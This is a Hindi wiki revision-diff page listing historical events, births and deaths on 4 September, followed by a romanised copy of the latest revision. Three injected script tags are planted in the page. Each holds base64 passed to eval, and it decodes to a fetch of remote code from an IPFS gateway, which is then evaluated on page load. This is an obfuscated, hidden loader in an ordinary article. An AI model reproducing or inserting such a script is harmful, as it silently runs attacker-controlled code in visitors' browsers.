Difference between revisions of "4 सितंबर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(9 intermediate revisions by the same user not shown)
Line 4: Line 4:
  
 
==4 सितंबर की महत्त्वपूर्ण घटनाएँ==
 
==4 सितंबर की महत्त्वपूर्ण घटनाएँ==
* 1665 - मुग़लों और छत्रपति शिवाजी महाराज के बीच राजा जय सिंह संधि पर हस्ताक्षर हुए।
+
* 1665 - [[मुग़ल|मुग़लों]] और [[शिवाजी|छत्रपति शिवाजी महाराज]] के बीच राजा जयसिंह संधि पर हस्ताक्षर हुए।
* 1781 - स्पेन के निवासियों द्वारा लॉस एंजिल्स की स्थापना की गयी।
+
* [[1781]] - [[स्पेन]] के निवासियों द्वारा लॉस एंजिल्स की स्थापना की गयी।
* [[1888]] - [[गांधीजी]] ने [[इंग्लैंड]] के लिए समुद्री यात्रा शुरु की।
+
* [[1888]] - [[गांधीजी]] ने [[इंग्लैंड]] के लिए समुद्री यात्रा शुरू की।
 
* [[1944]] - द्वितीय विश्व युद्ध के दौरान ब्रिटिश सैनिकों ने बेल्जियम के एंटवर्प शहर में प्रवेश किया।
 
* [[1944]] - द्वितीय विश्व युद्ध के दौरान ब्रिटिश सैनिकों ने बेल्जियम के एंटवर्प शहर में प्रवेश किया।
* [[1946]] - भारत में अंतरिम सरकार का गठन किया गया।
+
* [[1946]] - [[भारत]] में अंतरिम सरकार का गठन किया गया।
* [[1967]] - 6.5 तीव्रता वाले भूकंप की चपेट में अाया [[महाराष्ट्र]] का काेयना बांध, 200 से ज्यादा लोगाें की मौत।
+
* [[1967]] - 6.5 तीव्रता वाले [[भूकंप]] की चपेट में आया [[महाराष्ट्र]] का काेयना बांध, 200 से ज्यादा लोगाें की मौत।
 
* [[1969]] - उत्तरी वियतनाम के [[राष्ट्रपति]] एवं राष्ट्रपिता हो ची मिन्ह का देहावसान।  
 
* [[1969]] - उत्तरी वियतनाम के [[राष्ट्रपति]] एवं राष्ट्रपिता हो ची मिन्ह का देहावसान।  
* [[1985]] - 73 सालों के बाद समुद्र में डूबे जहाज टाइटेनिक की तस्वीरें सामने आई थीं। टाइटेनिक दुर्घटना में इस जहाज पर सवार 1,500 लोग मारे गए थे।
+
* [[1985]] - 73 सालों के बाद [[समुद्र]] में डूबे जहाज टाइटेनिक की तस्वीरें सामने आई थीं। टाइटेनिक दुर्घटना में इस जहाज पर सवार 1,500 लोग मारे गए थे।
* [[1998]] - अमेरिकी राष्ट्रपति बिल क्लिंटन ने आयरलैंड के डबलिन में स्वीकार किया कि मोनिका लेविंस्की के साथ सम्बन्ध क़ायम करना बड़ी ग़लती थी, [[डरबन]] में 12वें गुट निरपेक्ष शिखर सम्मेलन सम्पन्न।  
+
* [[1998]] - अमेरिकी राष्ट्रपति बिल क्लिंटन ने आयरलैंड के डबलिन में स्वीकार किया कि मोनिका लेविंस्की के साथ सम्बन्ध क़ायम करना बड़ी ग़लती थी।
* 1998 - लैरी पेज और सर्गेई ब्रिन ने स्टैनफोर्ड यूनिवर्सिटी में पी.एच.डी करने के दौरान इसे विकसित किया था।
+
**[[डरबन]] में 12वें गुट निरपेक्ष शिखर सम्मेलन सम्पन्न।  
 +
* [[1998]] - लैरी पेज और सर्गेई ब्रिन ने स्टैनफोर्ड यूनिवर्सिटी में पी.एच.डी करने के दौरान इसे विकसित किया था।
 
* [[1999]] - ईस्ट तिमोर में सम्पन्न हुए जनमत संग्रह में 78.5 प्रतिशत जनता ने इंडोनेशिया से स्वतंत्रता के पक्ष में अपना मत प्रकट किया।  
 
* [[1999]] - ईस्ट तिमोर में सम्पन्न हुए जनमत संग्रह में 78.5 प्रतिशत जनता ने इंडोनेशिया से स्वतंत्रता के पक्ष में अपना मत प्रकट किया।  
 
* [[2000]] - [[श्रीलंका]] के उत्तरी जाफना के बाहरी सीमाओं पर श्रीलंका सेना तथा मुक्ति चीते के बीच हुए संघर्ष में 316 लोग मारे गये।  
 
* [[2000]] - [[श्रीलंका]] के उत्तरी जाफना के बाहरी सीमाओं पर श्रीलंका सेना तथा मुक्ति चीते के बीच हुए संघर्ष में 316 लोग मारे गये।  
 
* [[2001]] - श्रीलंका ने मुशर्रफ़ से सैन्य मदद मांगने का फैसला किया।  
 
* [[2001]] - श्रीलंका ने मुशर्रफ़ से सैन्य मदद मांगने का फैसला किया।  
* [[2005]] - लोकतंत्र समर्थक प्रदर्शन करते नेपाल के पूर्व प्रधानमंत्री गिरिजा प्रसाद कोइराला गिरफ़्तार।  
+
* [[2005]] - लोकतंत्र समर्थक प्रदर्शन करते [[नेपाल]] के पूर्व प्रधानमंत्री गिरिजा प्रसाद कोइराला गिरफ़्तार।  
* [[2006]] - आस्ट्रेलिया के मशहूर टीवी पर्सनैलिटी और पर्यावरणविद स्टीव इरविन का एक समुद्री मछली 'स्टिंगरे' के काटने से निधन।  
+
* [[2006]] - [[ऑस्ट्रेलिया]] के मशहूर टीवी पर्सनैलिटी और पर्यावरणविद स्टीव इरविन का एक समुद्री मछली 'स्टिंगरे' के काटने से निधन।  
 
* [[2007]] - ईरान के पूर्व राष्ट्रपति अकबर हाशमी रफ़संजानी को ईरान की सर्वोच्च धार्मिक संस्था का प्रमुख चुना गया।  
 
* [[2007]] - ईरान के पूर्व राष्ट्रपति अकबर हाशमी रफ़संजानी को ईरान की सर्वोच्च धार्मिक संस्था का प्रमुख चुना गया।  
* [[2008]] -  
+
* [[2008]] - [[मायावती]] सरकार ने उत्तर प्रदेश संगठित अपराध विरोधी क़ानून (यूपीकोका) विधेयक-[[2007]] को तत्काल प्रभाव से वापस करने का निर्णय किया।  
**[[मायावती]] सरकार ने [[उत्तर प्रदेश]] संगठित अपराध विरोधी क़ानून (यूपीकोका) विधेयक-[[2007]] को तत्काल प्रभाव से वापस करने का निर्णय किया।  
 
 
**केन्द्रीय कैबिनेट ने सात राज्यों में निर्वाचन क्षेत्रों के पुनर्निर्धारण के सम्बन्ध में परिसीमन आयोग की सिफारिशों में सुधार के प्रस्ताव को मंज़ूरी दी।
 
**केन्द्रीय कैबिनेट ने सात राज्यों में निर्वाचन क्षेत्रों के पुनर्निर्धारण के सम्बन्ध में परिसीमन आयोग की सिफारिशों में सुधार के प्रस्ताव को मंज़ूरी दी।
* [[2009]] - गुजरात उच्च न्यायालय ने असवंत सिंह की [[मुहम्मद अली जिन्ना]] पर लिखी गई किताब पर [[गुजरात]] में लगे प्रतिबंध को हटाया। कोयला कम्पनी एस. सी. सी. एल. को मिनी रत्न कम्पनी के सम्मान स्वायत्ता दी गयी।
+
* [[2009]] - गुजरात उच्च न्यायालय ने असवंत सिंह की [[मुहम्मद अली जिन्ना]] पर लिखी गई किताब पर [[गुजरात]] में लगे प्रतिबंध को हटाया।
* [[2012]]- पैरालम्पिक खेलों में [[गिरीश होसंगारा नागराजेगौड़ा]] ने भारत को पहला पदक दिलाया।
+
**कोयला कम्पनी एस. सी. सी. एल. को मिनी रत्न कम्पनी के सम्मान स्वायत्ता दी गयी।
 +
* [[2012]] - पैरालम्पिक खेलों में [[गिरीश होसंगारा नागराजेगौड़ा]] ने [[भारत]] को पहला पदक दिलाया।
  
 
==4 सितंबर को जन्मे व्यक्ति==
 
==4 सितंबर को जन्मे व्यक्ति==
* 1825 - [[दादा भाई नौरोजी]] - राजनीतिज्ञ
+
* [[1982]] - [[गौरव गोगोई]] - भारतीय राज्य [[असम]] से [[भारतीय राष्ट्रीय कांग्रेस]] के राजनीतिज्ञ हैं।
* [[1941]] - सुशील कुमार शिंदे, भारतीय राजनीतिज्ञ
+
* [[1941]] - [[सुशील कुमार शिंदे]] - भारतीय राजनीतिज्ञ।
* [[1952]] - [[ऋषि कपूर]], भारतीय [[अभिनेता]]
+
* [[1952]] - [[ऋषि कपूर]] - भारतीय फ़िल्म अभिनेता, फ़िल्म निर्माता और निर्देशक थे।
* [[1962]] - किरण मोरे, भारतीय क्रिकेटर
+
* [[1962]] - [[किरण मोरे]] - भारतीय क्रिकेटर हैं।
* [[1971]] - लांस क्लूजनर दक्षिण अफ्रीका के क्रिकेटर।
+
* [[1971]] - लांस क्लूजनर - दक्षिण अफ्रीका के क्रिकेटर।
* [[1906]] - [[नंददुलारे वाजपेयी]] - [[हिन्दी]] के प्रसिद्ध पत्रकार, समीक्षक, साहित्यकार, आलोचक तथा सम्पादक थे।
+
* [[1924]] - [[के. वी. रघुनाथ रेड्डी]] - भारतीय राजनीतिज्ञ थे।
* [[1895 ]] - [[सियारामशरण गुप्त]], [[हिन्दी]] के प्रसिद्ध साहित्यकार
+
* [[1909]] - [[ब्रज कुमार नेहरू]] - प्रथम [[प्रधानमंत्री]] [[जवाहरलाल नेहरू]] के चचेरे भाई बृजलाल और रामेश्वरी नेहरू के पुत्र थे।
* [[1880]] - [[भूपेंद्रनाथ दत्त]] - [[भारत]] के [[स्वतंत्रता संग्राम]] के प्रसिद्ध क्रांतिकारी, लेखक तथा समाजशास्त्री थे।
+
* [[1906]] - [[नंददुलारे वाजपेयी]] - [[हिन्दी]] के प्रसिद्ध पत्रकार, समीक्षक, [[साहित्यकार]], आलोचक तथा सम्पादक थे।
 +
* [[1904]] - [[प्रेमेन्द्र मित्र]] - बंगाली कवि, लेखक तथा फ़िल्म निर्देशक थे।
 +
* [[1895 ]] - [[सियारामशरण गुप्त]] - [[हिन्दी]] के प्रसिद्ध साहित्यकार थे।
 +
* [[1825]] - [[दादा भाई नौरोजी]] - [[भारत]] के प्रसिद्ध राजनीतिज्ञ थे।
 +
* [[1880]] - [[भूपेंद्रनाथ दत्त]] - भारत के [[स्वतंत्रता संग्राम]] के प्रसिद्ध क्रांतिकारी, लेखक तथा समाजशास्त्री थे।
  
 
==4 सितंबर को हुए निधन==
 
==4 सितंबर को हुए निधन==
* [[1997]] - [[धर्मवीर भारती]]
+
* [[2015]] - [[विल्फ़्रेड डिसूजा]] - [[भारतीय राष्ट्रीय कांग्रेस]] के राजनीतिज्ञ, जो [[गोवा]] के भूतपूर्व [[मुख्यमंत्री]] थे।
 +
* [[2006]] - [[सत्येन्द्र नारायण सिंह]] - भारतीय राजनेता और [[बिहार]] के भूतपूर्व [[मुख्यमंत्री]] थे।
 +
* [[1997]] - [[धर्मवीर भारती]] - भारत के प्रसिद्ध साहित्यकार थे।
 +
* [[1984]] - [[भोला पासवान शास्त्री]] - भारतीय राजनीतिज्ञ और [[बिहार]] के आठवें [[मुख्यमंत्री]] थे। वह तीन बार [[बिहार के मुख्यमंत्री]] रहे।
 +
* [[1975]] - [[बलदेव प्रसाद मिश्र]] - [[हिन्दी]] के प्रसिद्ध [[साहित्यकार]], न्यायविद तथा लोकसेवक थे।
 
* [[1912]] - [[मोहनलाल विष्णु पंड्या]] - भारतेंदु कालीन प्रमुख साहित्यकारों में से एक थे।
 
* [[1912]] - [[मोहनलाल विष्णु पंड्या]] - भारतेंदु कालीन प्रमुख साहित्यकारों में से एक थे।
  

Latest revision as of 09:49, 12 November 2022

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 4 sitanbar varsh ka 247 vaan (lip varsh mean yah 248 vaan) din hai. sal mean abhi aur 118 din shesh haian.

4 sitanbar ki mahattvapoorn ghatanaean

  • 1665 - mugaloan aur chhatrapati shivaji maharaj ke bich raja jayasianh sandhi par hastakshar hue.
  • 1781 - spen ke nivasiyoan dvara l aaus eanjils ki sthapana ki gayi.
  • 1888 - gaandhiji ne ianglaiand ke lie samudri yatra shuroo ki.
  • 1944 - dvitiy vishv yuddh ke dauran british sainikoan ne beljiyam ke eantavarp shahar mean pravesh kiya.
  • 1946 - bharat mean aantarim sarakar ka gathan kiya gaya.
  • 1967 - 6.5 tivrata vale bhookanp ki chapet mean aya maharashtr ka kaeyana baandh, 200 se jyada logaean ki maut.
  • 1969 - uttari viyatanam ke rashtrapati evan rashtrapita ho chi minh ka dehavasan.
  • 1985 - 73 saloan ke bad samudr mean doobe jahaj taitenik ki tasvirean samane aee thian. taitenik durghatana mean is jahaj par savar 1,500 log mare ge the.
  • 1998 - ameriki rashtrapati bil kliantan ne ayaralaiand ke dabalin mean svikar kiya ki monika levianski ke sath sambandh qayam karana b di galati thi.
    • daraban mean 12vean gut nirapeksh shikhar sammelan sampann.
  • 1998 - lairi pej aur sargeee brin ne stainaphord yoonivarsiti mean pi.ech.di karane ke dauran ise vikasit kiya tha.
  • 1999 - eest timor mean sampann hue janamat sangrah mean 78.5 pratishat janata ne iandoneshiya se svatantrata ke paksh mean apana mat prakat kiya.
  • 2000 - shrilanka ke uttari japhana ke bahari simaoan par shrilanka sena tatha mukti chite ke bich hue sangharsh mean 316 log mare gaye.
  • 2001 - shrilanka ne musharraf se sainy madad maangane ka phaisala kiya.
  • 2005 - lokatantr samarthak pradarshan karate nepal ke poorv pradhanamantri girija prasad koirala giraftar.
  • 2006 - aaustreliya ke mashahoor tivi parsanailiti aur paryavaranavid stiv iravin ka ek samudri machhali 'stiangare' ke katane se nidhan.
  • 2007 - eeran ke poorv rashtrapati akabar hashami rafasanjani ko eeran ki sarvochch dharmik sanstha ka pramukh chuna gaya.
  • 2008 - mayavati sarakar ne uttar pradesh sangathit aparadh virodhi qanoon (yoopikoka) vidheyak-2007 ko tatkal prabhav se vapas karane ka nirnay kiya.
    • kendriy kaibinet ne sat rajyoan mean nirvachan kshetroan ke punarnirdharan ke sambandh mean parisiman ayog ki sipharishoan mean sudhar ke prastav ko manzoori di.
  • 2009 - gujarat uchch nyayalay ne asavant sianh ki muhammad ali jinna par likhi gee kitab par gujarat mean lage pratibandh ko hataya.
    • koyala kampani es. si. si. el. ko mini ratn kampani ke samman svayatta di gayi.
  • 2012 - pairalampik kheloan mean girish hosangara nagarajegau da ne bharat ko pahala padak dilaya.

4 sitanbar ko janme vyakti

4 sitanbar ko hue nidhan

4 sitanbar ke mahattvapoorn avasar evan utsav

  • rashtriy poshahar divas (saptah)

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>